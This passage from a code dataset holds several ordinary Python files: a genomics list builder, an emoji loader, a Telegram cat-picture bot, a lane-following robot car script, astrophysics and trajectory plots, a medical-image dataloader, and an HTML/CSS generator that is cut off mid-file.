self.filemap[k] = {}\n self.filemap[k + \"_all\"] = {}\n\n # for each assay\n for listfile in CreateHg38.LISTFILES:\n\n # load each exp accession from the existing list\n # for each, append only the first rep to one list and all reps to the other\n with open(os.path.join(rootdir, listfile), \"r\") as f:\n for line in f:\n p = line.strip().split('\\t')\n try:\n e = Exp.fromJsonFile(p[0])\n peaks, signal = CreateHg38._process(e)\n k = p[4] if len(p) >= 5 else p[2]\n self.filemap[listfile][(k, e.encodeID)] = (peaks[1].fileID, signal[1].fileID)\n self.filemap[listfile + \"_all\"][(k, e.encodeID)] = [(peaks[x].fileID, signal[x].fileID) for x, _ in signal.iteritems()]\n except:\n print(\"00_create_hg38$CreateHg38::__init__: could not process %s; skipping\" % p[0])\n\n # if DNase, write all reps to Hotspot-List.txt\n if listfile == \"dnase-list.txt\":\n CreateHg38._writehotspots(self.filemap[listfile + \"_all\"], \"/data/projects/cREs/hg38/Hotspot-List.txt\")\n print(\"wrote /data/projects/cREs/hg38/Hotspot-List.txt\")\n\n # write first reps to list file\n CreateHg38._writelist(self.filemap[listfile], \"/data/projects/cREs/hg38/%s\" % listfile)\n print(\"wrote /data/projects/cREs/hg38/%s\" % listfile)\n\n\ndef main():\n CreateHg38(\"/data/projects/screen/Version-4/ver10/hg19/raw\")\n return 0\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"0_cre_pipeline/just21/python/00_create_hg38.py","file_name":"00_create_hg38.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"609066352","text":"import json \nimport pandas as pd \nfrom pandas.io.json import json_normalize\n\n\ndef load_emoji_dict():\n\tfiles = ['Emojis/Activity.json', 'Emojis/Flags.json',\n\t\t\t\t 'Emojis/Food.json', 'Emojis/Nature.json',\n\t\t\t\t 'Emojis/Objects.json', 'Emojis/People.json',\n\t\t\t\t 'Emojis/Symbols.json', 'Emojis/Travel.json']\n\n\temoji_df = pd.DataFrame()\n\n\ttry:\n\t\temoji_df = pd.read_pickle('emojis.pkl')\n\n\texcept:\n\t\tfor file in files:\n\t\t\twith open(file) as f:\n\t\t\t\tdata = json.load(f)\n\t\t\t\tdf_temp = pd.DataFrame.from_dict(json_normalize(data), orient='columns') \n\t\t\t\temoji_df = emoji_df.append(df_temp, ignore_index=True)\n\n\t\temoji_df = emoji_df.set_index('key')\n\t\temoji_df.to_pickle('emojis.pkl')\n\n\temoji_dict = emoji_df.to_dict()\n\temoji_dict = emoji_dict['value']\n\treturn emoji_dict\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"604119386","text":"import os\n\nimport functools\n\nfrom telegram.ext import Updater, CommandHandler\nfrom telegram import ChatAction\nimport logging\n\nimport cat_api\n\n\ndef send_action(action):\n\n def decorator(func):\n @functools.wraps(func)\n def command_func(update, context, *args, **kwargs):\n context.bot.send_chat_action(chat_id=update.effective_message.chat_id, action=action)\n return func(update, context, *args, **kwargs)\n return command_func\n\n return decorator\n\n\ndef start_callback(update, context):\n context.bot.send_message(chat_id=update.message.chat_id,\n text=f'Hello, {update.effective_user.first_name}!\\nSee /help for instructions')\n\n\n@send_action(ChatAction.TYPING)\ndef help_callback(update, context):\n context.bot.send_message(chat_id=update.message.chat_id,\n text='To get a random catpic - just type /cat. '\n 'To get a specific breed - type /cat . '\n ' is four-character ID. 
'\n 'Here is the mapping of breeds and their IDs:\\n\\n'\n + str(cat_api.get_breeds_list()))\n\n\n@send_action(ChatAction.UPLOAD_PHOTO)\ndef cat_callback(update, context):\n context.bot.send_photo(chat_id=update.message.chat_id, photo=cat_api.cat_by_breed(context.args))\n\n\nif __name__ == '__main__':\n\n TOKEN = os.environ['TG_TOKEN']\n NAME = 'cats-tg-bot'\n PORT = os.environ.get('PORT')\n\n logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\n updater = Updater(TOKEN, use_context=True)\n\n dispatcher = updater.dispatcher\n\n dispatcher.add_handler(CommandHandler('start', start_callback))\n dispatcher.add_handler(CommandHandler('help', help_callback))\n dispatcher.add_handler(CommandHandler('cat', cat_callback))\n\n updater.start_webhook(listen=\"0.0.0.0\",\n port=int(PORT),\n url_path=TOKEN)\n updater.bot.setWebhook(f\"https://{NAME}.herokuapp.com/{TOKEN}\")\n updater.idle()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"261267984","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport modi\nimport time\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\ndef make_coordinates(image, line_parameters):\n slope, intercept = line_parameters\n y1 = image.shape[0]\n y2 = int(y1*(2/5))\n x1 = int((y1 - intercept)/slope)\n x2 = int((y2 - intercept)/slope)\n return np.array([x1, y1, x2, y2])\n\ndef average_slope_intercept(image, lines):\n left_fit = []\n right_fit = []\n for line in lines:\n x1, y1, x2, y2 = line.reshape(4)\n parameters = np.polyfit((x1, x2), (y1, y2), 1)\n slope = parameters[0]\n intercept = parameters[1]\n if slope < -0.5:\n left_fit.append((slope, intercept))\n elif 0.5 < slope:\n right_fit.append((slope, intercept))\n if (len(left_fit) != 0):\n left_fit_average = np.average(left_fit, axis=0)\n else:\n left_fit_average = ((1, 10))\n if (len(right_fit) != 0):\n right_fit_average = np.average(right_fit, axis=0)\n else:\n right_fit_average = ((1, 10))\n left_line = make_coordinates(image, left_fit_average)\n right_line = make_coordinates(image, right_fit_average)\n return np.array([left_line, right_line])\n\ndef canny(image):\n gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)\n blur = cv2.GaussianBlur(gray, (5, 5), 0)\n canny = cv2.Canny(blur, 50, 150)\n return canny\n\ndef display_lines(image, lines):\n line_image = np.zeros_like(image)\n if lines is not None:\n for x1, y1, x2, y2 in lines:\n cv2.line(line_image, (x1, y1), (x2, y2), (255, 0, 0), 10)\n return line_image\n\ndef t_display_lines(image, lines):\n line_image = np.zeros_like(image)\n if lines is not None:\n for line in lines:\n x1, y1, x2, y2 = line.reshape(4)\n cv2.line(line_image, (x1, y1), (x2, y2), (255, 0, 0), 10)\n return line_image\n\ndef region_of_interest(image):\n height = image.shape[0]\n polygons = np.array([[(100, height), (600, height), (500, 300), (120,300)]])\n mask = np.zeros_like(image)\n cv2.fillPoly(mask, polygons, 255)\n masked_image = cv2.bitwise_and(image, mask)\n return masked_image\n\ndef find_vanishing(image, lines):\n x11, y11, x12, y12 = lines[0]\n x21, y21, x22, y22 = lines[1]\n m1 = (y12 - y11) / (x12 - x11)\n m2 = (y22 - y21) / (x22 - x21)\n cx = int((x11 * m1 - y11 - x21 * m2 + y21) / (m1 - m2))\n center = int((x11+x21)/2)\n\n cv2.line(image, (cx, 0), (cx, image.shape[0]), (0, 0, 255), 10) \n cv2.putText(image, str(cx), (cx+10, 
100), cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 255), 2)\n cv2.line(image, (center, 0), (center, image.shape[0]), (0, 255, 0), 10)\n cv2.putText(image, str(center), (center+10, 100), cv2.FONT_HERSHEY_PLAIN, 2, (0, 255, 0), 2)\n\n return image, cx, center\n\ndef find_num(image, canny):\n _, contours, _ = cv2.findContours(canny, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n MIN_AREA = 50\n MAX_AREA = 5000\n MIN_RATIO, MAX_RATIO = 0.5, 1.0\n MIN_HEIGHT = 10\n dt = 50\n number = 10\n\n for contour in contours:\n x, y, w, h = cv2.boundingRect(contour)\n area = w * h\n ratio = w / h\n\n if MIN_AREA < area < MAX_AREA \\\n and MIN_RATIO < ratio < MAX_RATIO \\\n and MIN_HEIGHT < h:\n center_x = int((2 * x + w) / 2)\n center_y = int((2 * y + h) / 2)\n if ((center_x-dt) > 200) and (center_x < 600) and ((center_y-dt) > 400) and (center_y < 1000):\n img = image[center_y-dt:center_y+dt, center_x-dt:center_x+dt]\n number = process(img) \n cv2.rectangle(image, pt1=(center_x - 50, center_y - 50), pt2=(center_x + 50, center_y + 50), color=(0, 255, 0), thickness=2)\n cv2.putText(image, \"Number\", (x+w, y), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0), 1)\n else:\n cv2.rectangle(image, pt1=(x, y), pt2=(x+w, y+h), color=(255, 0, 0), thickness=2)\n cv2.putText(image, \"No\", (x+w, y), cv2.FONT_HERSHEY_PLAIN, 1, (255, 0, 0), 1)\n cv2.imshow('res', image)\n return number\n\ndef find_way(vanishing, center):\n diff = vanishing - center\n print(diff)\n if diff < -70:\n left()\n elif diff > 70:\n right()\n else:\n forward()\n\n# Initialize MazeRunner, gets MODI class\n# Add needed modules\ndef init_MR(bundle):\n print('modules list\\n', bundle.modules)\n motor = bundle.motors[0]\n return len(bundle.modules), motor\n\n# Checks module connection status by comparing module numbers.\ndef is_connected(curr_num):\n if curr_num != module_num:\n print('\\n--------interrupt!!!---------')\n print('Some modules disconnected!!')\n return False\n else:\n return True\n\n# MODI goes forward, gets delay, speed args\ndef forward(delay=3, speed=100):\n motor.speed(0, 0)\n time.sleep(0.001)\n # if button.clicked() == True:\n print('-----forward!!-----')\n for _ in range(delay):\n # mazeprint(ir.distance())\n time.sleep(0.001)\n motor.speed(speed, -speed)\n time.sleep(0.001)\n motor.speed(0, 0)\n\n# MODI turns left, gets delay arg.\ndef left(delay=1):\n motor.speed(0, 0)\n time.sleep(0.001)\n print('-----left!!-----')\n for _ in range(delay):\n time.sleep(0.001)\n motor.speed(-100, -100)\n time.sleep(0.001)\n motor.speed(0, 0)\n\n# MODI turns right, gets delay arg.\ndef right(delay=1):\n motor.speed(0, 0)\n time.sleep(0.001)\n print('-----right!!-----')\n for _ in range(delay):\n time.sleep(0.001)\n motor.speed(100, 100)\n time.sleep(0.001)\n motor.speed(0, 0)\n\n\nmsg_cnt = 100 \ndef mazeprint(msg, arg=None):\n global msg_cnt\n db = firestore.client()\n doc_ref = db.collection(u'Maze').document(str(msg_cnt))\n if arg:\n print(msg, arg)\n doc_ref.set({\n u'Text': str(msg) + \" \" + str(arg)\n })\n else:\n print(msg)\n doc_ref.set({\n u'Text': msg\n })\n msg_cnt = msg_cnt + 1\n\ndef delete_collection(coll_ref, batch_size):\n docs = coll_ref.limit(batch_size).get()\n deleted = 0\n\n for doc in docs:\n print(u'Deleting doc {} => {}'.format(doc.id, doc.to_dict()))\n doc.reference.delete()\n deleted = deleted + 1\n\n if deleted >= batch_size:\n return delete_collection(coll_ref, batch_size)\n\nif __name__==\"__main__\":\n # Initialize\n cred = credentials.Certificate(\"./AccountKey.json\")\n firebase_admin.initialize_app(cred)\n 
delete_collection(firestore.client().collection(u'Maze'), 200)\n bundle = modi.MODI()\n time.sleep(1)\n module_num, motor = init_MR(bundle)\n time.sleep(1)\n print('MODI Connected!')\n\n # Main\n cap = cv2.VideoCapture(-1)\n while(cap.isOpened()):\n time.sleep(0.01)\n _, frame = cap.read()\n canny_image = canny(frame)\n cropped_image = region_of_interest(canny_image)\n lines = cv2.HoughLinesP(cropped_image, 2, np.pi/180, 100, np.array([]), minLineLength=40, maxLineGap=3)\n if len(lines) < 2:\n continue\n averaged_lines = average_slope_intercept(frame, lines)\n find_vanishing(frame, averaged_lines)\n line_image = t_display_lines(frame, averaged_lines)\n vanishing_line, vanishing, center = find_vanishing(line_image, averaged_lines)\n combo_image = cv2.addWeighted(frame, 0.8, vanishing_line, 1, 1)\n find_way(vanishing, center)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n cap.release()\n cv2.destroyAllWindows()\n","sub_path":"src/EyeCar.py","file_name":"EyeCar.py","file_ext":"py","file_size_in_byte":6985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"11259687","text":"import numpy as np\nfrom dragons import meraxes\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport sys\nimport pandas as pd\nsys.path.append('/home/mmarshal/simulation_codes')\nimport ContourPlot as cp\nimport pylab as p\nimport scipy.stats as stats\nfrom scipy.optimize import curve_fit\nfrom _load_data import load_data\n\nmatplotlib.rcParams['font.size'] = (9)\nmatplotlib.rcParams['figure.figsize'] = (3.5,3.5)\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\ncolors=['#e41a1c','#377eb8','#4daf4a']\n\n\ndef plot_median_ratio(redshift,med,pctile84,pctile16,axes,color='b',**kwargs):\n axes.fill_between(np.array(list(redshift.values())),np.array(list(pctile84.values())),\\\n np.array(list(pctile16.values())),alpha=0.15,color=color)\n axes.plot(np.array(list(redshift.values())),np.array(list(med.values())),'-',linewidth=2.5,color=color,**kwargs)\n\n\ndef find_med(gals,stellarmass):\n gals=gals[gals[stellarmass]>0]\n if np.size(gals)==0:\n return [np.nan,np.nan,np.nan]\n else:\n pct=np.log10(np.percentile(gals['BlackHoleMass']/gals[stellarmass],[50,84,16]))\n return pct\n\n \ndef func(x,a,b):\n return b**np.log10(1+x)+np.log10(a)\n\n\ndef func_plot(x,a,b):\n return a *(1+x)**b\n\n\ndef plot_schulze(axes):\n obs=[0.025,0.34,0.52,1.29]\n intrinsic=[0.025,0.15,0.15,-0.02]\n z=[0.56,1.5,4.2,6]\n z_err_1=[-0.175,0.175]\n z_err_2=[-0.5,0.5]\n z_err_3=[-0.1,0.1]\n z_err_4=[-0.25,0.25]\n z_err=[[0.175,0.5,0.1,0.25],[0.175,0.5,0.1,0.25]]\n in_err_1=[-0.09,0.09]\n in_err_2=[-0.08,0.27]\n in_err_3=[-1.49,0.98]\n in_err_4=[-2.76,1.36]\n in_err=[[0.09,0.08,1.49,2.76],[0.09,0.27,0.98,1.36]]\n axes.errorbar(z,np.array(intrinsic)-2.85,xerr=np.array(z_err),yerr=np.array(in_err),marker='o',capsize=2,linestyle='None',color='gray')\n axes.plot(z,np.array(obs)-2.85,'o',markerfacecolor='white',markeredgecolor='gray')\n\nif __name__==\"__main__\":\n filename='paper2'\n filename2='paper2_T125'\n filenameMR='paper2_T125MR'\n filenameNR='draft2_T125NR'\n #snapshots=np.linspace(52,158,30)\n snapshots=np.arange(30,80,10)\n med={}\n pctile84={}\n pctile16={}\n med_b={}\n pctile84_b={}\n pctile16_b={}\n med_125_b={}\n pctile84_125_b={}\n pctile16_125_b={}\n med_125={}\n pctile84_125={}\n pctile16_125={}\n med_MR={}\n pctile84_MR={}\n pctile16_MR={}\n med_NR={}\n pctile84_NR={}\n pctile16_NR={}\n\n redshift={}\n for snapshot in snapshots:\n 
redshift[snapshot]=meraxes.io.grab_redshift('/home/mmarshal/data_dragons/'+filename+'/output/meraxes.hdf5', int(snapshot))\n gals=load_data(filename,snapshot,['StellarMass','BulgeStellarMass','BlackHoleMass'])\n gals=gals[(gals['BlackHoleMass']*1e10>1e6)]\n\n med[snapshot],pctile84[snapshot],pctile16[snapshot]=find_med(gals,'StellarMass')\n \n gals_125=load_data(filename2,snapshot,['StellarMass','BulgeStellarMass','BlackHoleMass'])\n gals_125=gals_125[(gals_125['BlackHoleMass']*1e10>1e6)]\n med_125[snapshot],pctile84_125[snapshot],pctile16_125[snapshot]=find_med(gals_125,'StellarMass')\n\n gals_MR=load_data(filenameMR,snapshot,['StellarMass','BulgeStellarMass','BlackHoleMass'])\n gals_MR=gals_MR[(gals_MR['BlackHoleMass']*1e10>1e6)]\n med_MR[snapshot],pctile84_MR[snapshot],pctile16_MR[snapshot]=find_med(gals_MR,'StellarMass')\n \n #gals_NR=load_data(filenameNR,snapshot,['StellarMass','BulgeStellarMass','BlackHoleMass'])\n #med_NR[snapshot],pctile84_NR[snapshot],pctile16_NR[snapshot]=find_med(gals_NR,'StellarMass')\n #med_125_b[snapshot],pctile84_125_b[snapshot],pctile16_125_b[snapshot]=find_med(gals_125,'BulgeStellarMass')\n \n\n fig,axes=plt.subplots(1,1)\n axes.set_xlabel('Redshift')\n \n plot_median_ratio(redshift,med,pctile84,pctile16,axes,color=colors[0],**{'label':'Tiamat'})\n plot_median_ratio(redshift,med_125,pctile84_125,pctile16_125,axes,color=colors[1],**{'label':'Tiamat-125-HR','linestyle':'-','lw':1})\n plot_median_ratio(redshift,med_MR,pctile84_MR,pctile16_MR,axes,color=colors[2],**{'label':'Tiamat-125-MR','linestyle':'-','lw':1})\n\n lgd=axes.legend(fontsize='small',ncol=3,loc='upper center', bbox_to_anchor=(0.42, -0.2))\n\n axes.set_ylabel(r'$\\log(M_{\\mathrm{BH}}/M_{\\ast})$')\n axes.invert_xaxis()\n axes.set_xlim([8,2]) \n axes.set_ylim([-4.1,-1.9]) \n axes.set_yticks(np.arange(-4.0,-1.99, 0.5))\n\n plt.tight_layout()\n fig.savefig('/home/mmarshal/results/plots/Paper2/MeanBHBulge_resolutionTest.pdf', format='pdf',bbox_extra_artists=(lgd,), bbox_inches='tight')\n plt.show()\n","sub_path":"MeanBHBulge_resolutionTest.py","file_name":"MeanBHBulge_resolutionTest.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"333329371","text":"import numpy as np\n#from sklearn.metrics import f1_score\n#D: this is some package for meidcal images, so getting rid of it\n#import nibabel as nib\nimport os\n\n#to make directories\nimport pathlib\nfrom skimage import transform\n\nclass dataloaderObj:\n\n #define functions to load data from ACDC dataset\n def __init__(self,cfg):\n #print('dataloaders init')\n self.data_path_tr=cfg.data_path_tr\n self.data_path_tr_cropped=cfg.data_path_tr_cropped\n self.target_resolution=cfg.target_resolution\n self.size=cfg.size\n self.num_classes=cfg.num_classes\n\n def normalize_minmax_data(self, image_data):\n \"\"\"\n # 3D MRI scan is normalized to range between 0 and 1 using min-max normalization.\n Here, the minimum and maximum values are used as 2nd and 98th percentiles respectively from the 3D MRI scan.\n We expect the outliers to be away from the range of [0,1].\n input params :\n image_data : 3D MRI scan to be normalized using min-max normalization\n returns:\n final_image_data : Normalized 3D MRI scan obtained via min-max normalization.\n \"\"\"\n min_val_2p=np.percentile(image_data,2)\n max_val_98p=np.percentile(image_data,98)\n final_image_data=np.zeros((image_data.shape[0],image_data.shape[1],image_data.shape[2]), dtype=np.float64)\n # min-max norm on 
total 3D volume\n final_image_data=(image_data-min_val_2p)/(max_val_98p-min_val_2p)\n return final_image_data\n\n\n def load_acdc_imgs(self, study_id_list,ret_affine=0):\n \"\"\"\n #Load ACDC data image and its label with pixel dimensions\n input params :\n study_id_list: id no of the image to be loaded\n ret_affine: variable to enable returning of affine transformation matrix of the loaded image\n returns :\n image_data_test_sys : normalized 3D image\n label_data_test_sys : 3D label mask of the image\n pixel_size : pixel dimensions of the loaded image\n affine_tst : affine transformation matrix of the loaded image\n \"\"\"\n\n for study_id in study_id_list:\n path_files=str(self.data_path_tr)+str(study_id)+'/'\n systole_lstfiles = [] # create an empty list\n for dirName, subdirList, fileList in os.walk(path_files):\n fileList.sort()\n for filename in fileList:\n if \"_frame01\" in filename.lower():\n systole_lstfiles.append(os.path.join(dirName,filename))\n elif \"_frame04\" in filename.lower():\n systole_lstfiles.append(os.path.join(dirName,filename))\n\n # Load the 3D image\n image_data_test_load = nib.load(systole_lstfiles[0])\n image_data_test_sys=image_data_test_load.get_data()\n pixel_size=image_data_test_load.header['pixdim'][1:4]\n affine_tst=image_data_test_load.affine\n\n # Normalize input data\n image_data_test_sys=self.normalize_minmax_data(image_data_test_sys)\n\n # Load the segmentation mask\n label_data_test_load = nib.load(systole_lstfiles[1])\n label_data_test_sys=label_data_test_load.get_data()\n\n if(ret_affine==0):\n return image_data_test_sys,label_data_test_sys,pixel_size\n else:\n return image_data_test_sys,label_data_test_sys,pixel_size,affine_tst\n\n\n def crop_or_pad_slice_to_size_1hot(self, img_slice, nx, ny):\n\n \"\"\"\n To crop the input 2D slice for the given dimensions in 1-hot encoding format)\n input params :\n image_slice : 2D slice to be cropped (in 1-hot encoding format)\n nx : dimension in x\n ny : dimension in y\n returns:\n slice_cropped : cropped 2D slice\n \"\"\"\n slice_cropped=np.zeros((nx,ny,self.num_classes))\n x, y, _ = img_slice.shape\n\n x_s = (x - nx) // 2\n y_s = (y - ny) // 2\n x_c = (nx - x) // 2\n y_c = (ny - y) // 2\n\n if x > nx and y > ny:\n slice_cropped = img_slice[x_s:x_s + nx, y_s:y_s + ny]\n else:\n slice_cropped = np.zeros((nx, ny,self.num_classes))\n if x <= nx and y > ny:\n slice_cropped[x_c:x_c + x, :] = img_slice[:, y_s:y_s + ny]\n elif x > nx and y <= ny:\n slice_cropped[:, y_c:y_c + y] = img_slice[x_s:x_s + nx, :]\n else:\n slice_cropped[x_c:x_c + x, y_c:y_c + y] = img_slice[:, :]\n\n return slice_cropped\n\n def crop_or_pad_slice_to_size(self, img_slice, nx, ny):\n \"\"\"\n To crop the input 2D slice for the given dimensions\n input params :\n image_slice : 2D slice to be cropped\n nx : dimension in x\n ny : dimension in y\n returns:\n slice_cropped : cropped 2D slice\n \"\"\"\n slice_cropped=np.zeros((nx,ny))\n x, y = img_slice.shape\n\n x_s = (x - nx) // 2\n y_s = (y - ny) // 2\n x_c = (nx - x) // 2\n y_c = (ny - y) // 2\n\n if x > nx and y > ny:\n slice_cropped = img_slice[x_s:x_s + nx, y_s:y_s + ny]\n else:\n slice_cropped = np.zeros((nx, ny))\n if x <= nx and y > ny:\n slice_cropped[x_c:x_c + x, :] = img_slice[:, y_s:y_s + ny]\n elif x > nx and y <= ny:\n slice_cropped[:, y_c:y_c + y] = img_slice[x_s:x_s + nx, :]\n else:\n slice_cropped[x_c:x_c + x, y_c:y_c + y] = img_slice[:, :]\n\n return slice_cropped\n\n def preprocess_data(self, img, mask, pixel_size,label_present=1):\n \"\"\"\n To preprocess the input 3D 
volume into given target resolution and crop them into dimensions specified in the init_acdc.py file\n input params :\n img : input 3D image volume to be processed\n mask : corresponding 3D segmentation mask to be processed\n pixel_size : the native pixel size of the input image\n label_present : to indicate if the image has labels provided or not (used for unlabeled images)\n returns:\n cropped_img : processed and cropped 3D image\n cropped_mask : processed and cropped 3D segmentation mask\n \"\"\"\n nx,ny=self.size\n\n #scale vector to rescale to the target resolution\n scale_vector = [pixel_size[0] / self.target_resolution[0], pixel_size[1] / self.target_resolution[1]]\n\n for slice_no in range(img.shape[2]):\n\n slice_img = np.squeeze(img[:, :, slice_no])\n slice_rescaled = transform.rescale(slice_img,\n scale_vector,\n order=1,\n preserve_range=True,\n mode = 'constant')\n if(label_present==1):\n slice_mask = np.squeeze(mask[:, :, slice_no])\n mask_rescaled = transform.rescale(slice_mask,\n scale_vector,\n order=0,\n preserve_range=True,\n mode='constant')\n\n slice_cropped = self.crop_or_pad_slice_to_size(slice_rescaled, nx, ny)\n if(label_present==1):\n mask_cropped = self.crop_or_pad_slice_to_size(mask_rescaled, nx, ny)\n\n if(slice_no==0):\n cropped_img=np.reshape(slice_cropped,(nx,ny,1))\n if(label_present==1):\n cropped_mask=np.reshape(mask_cropped,(nx,ny,1))\n else:\n slice_cropped_tmp=np.reshape(slice_cropped,(nx,ny,1))\n cropped_img=np.concatenate((cropped_img,slice_cropped_tmp),axis=2)\n if(label_present==1):\n mask_cropped_tmp=np.reshape(mask_cropped,(nx,ny,1))\n cropped_mask=np.concatenate((cropped_mask,mask_cropped_tmp),axis=2)\n\n if(label_present==1):\n return cropped_img,cropped_mask\n else:\n return cropped_img\n\n def load_imgs(self, dataset= 'lab'):\n \"\"\"\n # Load the training or validation images\n input params :\n val : if TRUE, loads validation images. 
default value is False and loads labeled training images\n label_present : to indicate if the image has labels provided or not (used for unlabeled images)\n returns:\n img_cat : stack of 3D images of all the patient id nos.\n mask_cat : corresponding stack of 3D segmentation masks of all the patient id nos.\n \"\"\"\n\n if dataset == 'val':\n img_type = 'val'\n label_present = 1\n elif dataset == 'lab':\n img_type = 'lab'\n label_present = 1\n elif dataset == 'unlab':\n img_type = 'unlab'\n label_present = 0\n else:\n raise ValueError('invalid dataset type specified or data filename wrong')\n\n #D: change path name to end in \"large\", ie: '_x_large.npy' and '_y_large.npy' vs '_x_mini.npy' and '_y_mini.npy'\n # to use large dataset\n img_fname = str(self.data_path_tr_cropped)+'/' + img_type + '_x_large2.npy'\n img_tmp=np.load(img_fname)\n if(label_present==1):\n mask_fname = str(self.data_path_tr_cropped)+'/' + img_type + '_y_large2.npy'\n mask_tmp=np.load(mask_fname)\n\n if(label_present==1):\n print('image shape: ', img_tmp.shape)\n print('mask shape: ', mask_tmp.shape)\n return img_tmp,mask_tmp\n else:\n print('image shape: ', img_tmp.shape)\n return img_tmp","sub_path":"tree_gan/dataloaders.py","file_name":"dataloaders.py","file_ext":"py","file_size_in_byte":9783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"236508074","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ntime = np.linspace(0,5,101)\ng = 9.81\nv_0 = 20\n\ndef calc_x(time, theta):\n x_pos = v_0 * time * np.cos(theta)\n return x_pos\n\ndef calc_y(time, theta):\n y_pos = (v_0 * time * np.sin(theta)) - (0.5 * g * time**2)\n return y_pos\n\nfor deg in (30, 45, 60):\n \n rad = (np.pi / 180) * deg\n xs = calc_x(time, rad)\n ys = calc_y(time, rad)\n\n idx = 0\n for i, y in enumerate(ys):\n if y < 0:\n idx = i\n break\n \n plt.plot(xs[:idx], ys[:idx], 'o', label=f'{deg}°')\n\nplt.title('Trajectories. v0 = 20 m/s')\nplt.xlabel('distance / m')\nplt.ylabel('height / m')\nplt.legend()\nplt.savefig('trajectory.png')\nplt.show()\n","sub_path":"trajectory.py","file_name":"trajectory.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"398143572","text":"import sys\nimport os\n\nimport util\nimport parser\nimport htmlwriter\n\n#create the initial HTML file\ndef initFile(filename):\n html_file = util.constructString(\n \"\",\n \"\",\n \"\",\n \"\" + filename + \"\",\n \"\",\n \"\\t\",\n \"\\t\" + util.addJs(filename + \".js\"),\n \"\\t\" + util.addJs(\"https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js\"),\n \"\\t\" + util.addJs(\"https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML\", \"async\"),\n \"\",\n \"\"\n )\n\n html_file += util.constructString(\n \"
\",\n \"
\"\n )\n\n html_fd = open(filename + \".html\", \"w+\")\n html_fd.write(html_file)\n\n css_fd = open(filename + \".css\", \"w+\")\n\n css_file = util.addCss(\n \"html\", \"font-family: Arial, Helvetica, sans-serif\",\n \"line-height: 2\"\n )\n css_file += util.addCss(\n \":root\",\n \"--primary:#9c84a4\",\n \"--highlight:#b597bf\"\n )\n #add the media query for the body\n css_file += util.addMediaQuery(\n \"1600\", \"10000\",\n \"body\", \"display:grid\",\n \"grid-template-columns: auto 800px auto\",\n \"margin:0px\",\n \"padding:0px\"\n )\n css_file += util.addMediaQuery(\n \"1280\", \"1599\",\n \"body\", \"display:grid\",\n \"grid-template-columns: 350px auto 350px\"\n )\n css_file += util.addMediaQuery(\n \"1025\", \"1280\",\n \"body\", \"display:grid\",\n \"grid-template-columns: auto minmax(auto, 800px) auto\"\n )\n css_file += util.addMediaQuery(\n \"768\", \"1024\",\n \"body\", \"display:grid\",\n \"grid-template-columns: 50px auto 50px\"\n )\n css_file += util.addMediaQuery(\n \"481\", \"767\", \"body\", \"display:grid\",\n \"grid-template-columns: 25px auto 25px\"\n )\n css_file += util.addMediaQuery(\n \"320\", \"480\", \"body\", \"display:grid\",\n \"grid-template-columns: 10px auto 10px\"\n )\n css_file += util.addCss(\n \"p,h2,ul,ol,h1,pre\", \"grid-column-start : 2\",\n \"grid-column-end : 3\",\n \"width:inherit\",\n \"margin:15px\"\n )\n css_file += util.addCss(\n \"b,i,a\", \"grid-column-start : 2\",\n \"grid-column-end : 3\",\n \"padding-left:15px\",\n \"padding-right:15px\"\n )\n css_file += util.addCss(\n \"h1,h2\", \"margin-top:0px\",\n \"margin-bottom:0px\"\n )\n css_file += util.addCss(\n \".background\", \"background-color:rgb(250, 250, 250 )\"\n )\n css_file += util.addCss(\n \"hr\",\n \"height: 1px\",\n \"border: 0\",\n \"border-top: 1px solid gray\",\n \"margin: 2.5px\",\n \"padding: 0\",\n \"width: 90%\",\n )\n css_file += util.addCss(\n \".draggable\",\n \"position:absolute\",\n \"z-index:9\",\n \"border:1px solid #d3d3d3\",\n \"background-color:white\",\n \"max-width:500px\",\n \"border-radius: 10px 10px 0px 0px\",\n \"box-shadow: 1px 1px 12px grey;\"\n )\n\n css_file += util.addCss(\n \".draggable_content\",\n \"max-height:400px\",\n \"overflow-y:auto\",\n )\n\n css_file += util.addCss(\n \".ref_header\",\n \"cursor:move\",\n \"z-index:10\",\n \"background-color:#9c84a4\",\n \"color:#fff\",\n \"display: grid\",\n \"grid-template-columns: 10px auto 20px 10px\",\n \"grid-column-start: 1\",\n \"align-items: center\",\n \"border-radius: 10px 10px 0px 0px\"\n )\n css_file += util.addCss(\n \".navbar\",\n \"background: white\",\n \"position: fixed\",\n \"top : 0px\",\n \"height:100%\",\n \"z-index:100\",\n \"-webkit-transition: all 0.3s ease\",\n \"-moz-transition: all 0.3s ease\",\n \"transition: all 0.3s ease\"\n )\n css_file += util.addCss(\n \".navbar h3\",\n \"color: white\",\n \"font-size: 1.9em\",\n \"padding: 20px\",\n \"margin: 0\",\n \"font-weight: 300\",\n \"background: var(--primary)\",\n 